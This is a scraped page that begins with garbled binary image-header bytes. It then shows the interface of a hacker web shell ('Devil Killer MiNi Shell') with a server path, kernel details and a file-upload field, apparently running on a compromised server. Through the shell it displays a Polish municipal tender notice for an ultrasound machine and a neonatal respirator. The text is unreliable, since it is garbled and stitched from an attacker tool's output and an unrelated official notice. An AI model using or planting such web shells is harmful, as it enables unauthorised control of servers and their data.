JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220912/0034408701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa urządzeń medycznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasto Lubartów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019388</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Jana Pawła II 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubartów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81 8552273</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">81 8552016</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@jmlubartow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lubartow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa urządzeń medycznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-23f51f54-3035-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00344087</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się za pośrednictwem: <br/>a) miniPortalu - https://miniportal.uzp.gov.pl, <br/>b) ePUAPu - adres: /UMLubartow/SkrytkaESP na: https://epuap.gov.pl/wps/portal,<br/>c) poczty elektronicznej: bzp@umlubartow.pl. <br/>2)	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do „Formularza do komunikacji&#34;.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). <br/>2)	Zasady składania ofert oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na platformie Windows, Mac i Linux .<br/>3)	Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru danych:<br/>- specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2, <br/>- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem UTF-8, <br/>- oznaczenia czasu odbioru danych - miniPortal - wszelkie operacje opierają się o czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy, <br/>- integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane poświadczenia&#34; jest zawarta informacja o dacie doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>- Microsoft Internet Explorer od wersji 11.0,<br/>- Mozilla Firefox od wersji 15,<br/>- Google Chrome od wersji 20,<br/>- Microsoft Edge.<br/>4)	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku&#34; i „Formularza do komunikacji&#34; wynosi 150 MB.<br/>5)	Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6)	Zamawiający przekazuje link do postępowania oraz ID postępowania jako załącznik do niniejszej SWZ. Dane postępowanie można wyszukać również na Liście wszystkich postępowań w miniPortalu, klikając wcześniej opcję „Dla Wykonawców&#34; lub ze strony głównej z zakładki Postępowania.<br/>7)	Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku&#34; dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.<br/>8)	Ofertę należy sporządzić w języku polskim.<br/>9)	Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>10)	Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika&#34;, dostępnej na stronie: https://miniportal.uzp.gov.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1)	administratorem danych osobowych jest Zamawiający;<br/>2)	wyznaczyliśmy inspektora ochrony danych, z którym można kontaktować się we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych poprzez adres email: iod@umlubartow.pl, lub pisemnie na adres Administratora danych; kontakt: e-mail: iod@umlubartow.pl, tel. 81 8552018;<br/>3) dane osobowe zawarte w ofercie i dokumentach Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr referencyjny BZP.271.49.2022 na Zakup i dostawę urządzeń medycznych;<br/>4)	odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania; <br/>5)	dane osobowe Wykonawcy będą przechowywane do czasu zakończenia postępowania oraz przez okres zgodny z kategorią archiwalną, wynikającą z jednolitego rzeczowego wykazu akt organów gminy i związków międzygminnych oraz urzędów obsługujących te organy i związki stanowiącego załącznik <br/>do Rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. z 2011 r., Nr 14 poz. 67 z późn. zm.); <br/>6)	obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	Wykonawca posiada :<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>−	na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych <br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych osobowych narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1)	Wykonawcy nie przysługuje:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2)	Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych, o którym mowa w art. 16 Rozporządzenia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP.<br/>3)	Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 Rozporządzenia, nie może naruszać integralności protokołu postępowania oraz jego załączników. <br/>4)	W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 Rozporządzenia, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>5)	W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 Rozporządzenia, spowoduje ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o których mowa w art. 18 ust. 2 Rozporządzenia.<br/>6)	W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 Rozporządzenia, są wykonywane w drodze żądania skierowanego do Zamawiającego.<br/>7)	W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym mowa w art. 15 ust. 1–3 Rozporządzenia, Zamawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.49.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa ultrasonografu.<br/>Opis:<br/>a)	Kliniczny, cyfrowy, aparat ultrasonograficzny klasy Premium z kolorowym Dopplerem.	<br/>b)	Regulacja wysokości pulpitu min. 25cm <br/>c)	Przetwornik cyfrowy min. 14-bitowy<br/>d)	Cyfrowy system formowania wiązki ultradźwiękowej	<br/>e)	Ilość niezależnych aktywnych kanałów przetwarzania min. 2 200 000<br/>f)	Ilość aktywnych gniazd głowic obrazowych min. 3<br/>g)	Dynamika systemu min. 250 dB<br/>h)	Monitor LCD o wysokiej rozdzielczości bez przeplotu. Przekątna ekranu min. 21 cali<br/>i)	Konsola aparatu ruchoma w dwóch płaszczyznach góra-dół, lewo-prawo	<br/>j)	Dotykowy, programowalny panel sterujący LCD wbudowany w konsolę Przekątna min. 7”<br/>k)	Zakres częstotliwości pracy min. od 3 MHz do 17 MHz.<br/>l)	Liczba obrazów pamięci dynamicznej (tzw. Cineloop) min. 13 000 obrazów<br/>m)	Możliwość regulacji prędkości odtwarzania w pętli pamięci dynamicznej obrazów (tzw. Cineloop) <br/>n)	Możliwość uzyskania sekwencji Cineloop w trybie 4B tj. 4 niezależnych sekwencji Cineloop jednocześnie na jednym obrazie	<br/>p)	Regulacja głębokości pola obrazowania min. 2 - 40 cm<br/>q)	Pamięć dynamiczna dla trybu M-mode lub D-mode min. 10 s<br/>r)	Obrazowanie w trybie M-mode anatomiczny w czasie rzeczywistym i z pamięci Cineloop z min. 2 kursorów	<br/>s)	Ilość ustawień wstępnych (tzw. Presetów) programowanych przez użytkownika min. 40. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33112200-0 - Aparaty ultrasonograficzne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria i ich znaczenie, odrębnie w odniesieniu odrębnie do każdej części zamówienia:<br/><br/>1.	Cena (C)	60%	60 punktów<br/>2.	Okres gwarancji jakości (G)	10%	10 punktów<br/>3.	Jakość (J)	30%	30 punktów<br/><br/>2)	Zasady oceny kryteriów<br/>a)	W kryterium „Cena” oferta otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P (C) = Cmin/Cbad x Max (C)<br/>	<br/>gdzie:<br/>P(C)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Cena&#34;<br/>Cmin	Najniższa cena spośród wszystkich ważnych i nieodrzuconych ofert<br/>Cbad	Cena oferty badanej<br/>Max (C)	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Cena&#34; (60).<br/> W tym kryterium oferta może uzyskać maksymalnie 60 punktów. <br/><br/>b)	W kryterium „Okres gwarancji jakości” oferta otrzyma liczbę punktów: <br/>- za okres gwarancji 24 miesięcy (minimalny okres gwarancji) – 0 pkt, <br/>- za okres gwarancji 25 - 30 miesięcy – 2,0 pkt,<br/>- za okres gwarancji 31 - 36 miesięcy – 4,0 pkt,<br/>- za okres gwarancji 37 - 42 miesięcy – 6,0 pkt,<br/>- za okres gwarancji 43 - 47 miesięcy – 8,0 pkt,<br/>- za okres gwarancji 48 miesięcy i więcej – 10,0 pkt,<br/> <br/>Wykonawca w Formularzu oferty wskazuje okres gwarancji jakości dla danego urządzenia (części zamówienia), z zastrzeżeniem, że nie może być on krótszy niż 24 miesięcy. Maksymalny punktowany okres gwarancji jakości to 48 miesięcy. W przypadku zaoferowania przez wykonawcę dłuższego, niż 48 miesięcy okresu gwarancji jakości zamawiający przyjmie do oceny okres gwarancji wynoszący 48 miesięcy. W przypadku nie wpisania żadnego okresu Zamawiający odrzuci ofertę. <br/>W tym kryterium oferta może uzyskać maksymalnie 10 punktów. <br/><br/>c)	W kryterium „Jakość” oferta w odniesieniu dla danej części zamówienia otrzyma zaokrągloną do dwóch miejsc po przecinku liczbę punktów wynikającą z działania:<br/><br/>P(J) = Jbad/ JN x MaxJ,<br/>gdzie:<br/>P(J)	Liczba punktów jakie otrzyma oferta „i&#34; za kryterium &#34;Jakość&#34;<br/>JN	Największa liczba punktów przyznana ofercie (danej części)<br/>Jbad	Liczba punktów przyznana ofercie badanej<br/>MaxJ	Maksymalna liczba punktów jakie może otrzymać oferta za kryterium „Jakość&#34; (30 pkt).<br/><br/>Punkty za jakość będą przyznawane w oparciu o dołączone przez Wykonawców do ofert wypełnione Tabele parametrów technicznych i eksploatacyjnych dla cz. I - IV, według parametrów określonych w załączniku do SWZ Opis przedmiotu zamówienia dla cz. I – IV .<br/>Najwyższą liczbę punktów za kryterium jakości uzyska oferta, która uzyska najlepsze parametry jakościowe w odniesieniu do wymogów określonych przez Zamawiającego. Każdy z ocenianych parametrów, uznany przez Zamawiającego za najkorzystniejszy uzyska wskazaną w załączniku Opis przedmiotu zamówienia dla cz. I – IV punktację – maksymalną liczbę punktów. Pozostałe oferty uzyskają odpowiednio niższą liczbę punktów.<br/>Zamawiający, w celu ustalenia rankingu ofert przyzna punkty na podstawie deklaracji Wykonawcy zawartych w Załącznikach do ofert – wypełnionych przez Wykonawców Tabelach parametrów technicznych i eksploatacyjnych.<br/>W tym kryterium oferta może uzyskać maksymalnie 30 punktów.<br/><br/>d)	Ostateczna liczba punktów dla każdej z ofert i oddzielnie dla każdej części zamówienia zostanie obliczona wg następującego wzoru:<br/> Oip = P(C) + P(G) + P(J)<br/> <br/>gdzie:<br/> Oip – oznacza łączną ocenę jako sumę punktów w poszczególnych kryteriach<br/> P(C) – liczba punktów uzyskanych w kryterium „Cena”<br/> P(G) - liczba punktów uzyskanych w kryterium „Okres gwarancji jakości”<br/> P(J) – liczba punktów uzyskanych w kryterium „Jakość”<br/><br/>	Oferta może otrzymać maksymalnie 100 punktów dla danej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa respiratora nieinwazyjnego dla wcześniaków, noworodków i dzieci.<br/>Aparat do wspomagania oddechu metodą nieinwazyjną u noworodków, wcześniaków i dzieci, o ergonomicznej konstrukcji. Może być stosowany u dzieci o wadze od 0,5 kg do 30 kg. Wykorzystuje efekt Coanda dla zmiany kierunku przepływu gazów (generator z przerzutnikiem strumieni). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44611200-8 - Respiratory</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">70 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy 